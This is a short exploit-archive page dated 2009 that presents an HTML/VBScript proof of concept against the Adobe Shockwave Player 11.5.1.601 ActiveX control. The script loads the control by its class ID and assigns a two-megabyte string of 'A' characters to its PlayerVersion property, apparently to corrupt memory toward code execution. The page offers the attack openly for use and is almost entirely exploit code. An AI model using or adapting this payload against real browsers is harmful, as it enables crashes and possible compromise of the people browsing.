[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Adobe Shockwave 11.5.1.601 Player Multiple Code Execution Vulnerability
# Published : 2009-11-04
# Author : Francis Provencher
# Previous Title : Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection
# Next Title : Xion Audio Player 1.0 121 .m3u file Buffer Overflow


<html>

<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>

argCount = 1

arg1=String(2097152, "A")

ShockW.PlayerVersion = arg1

</script>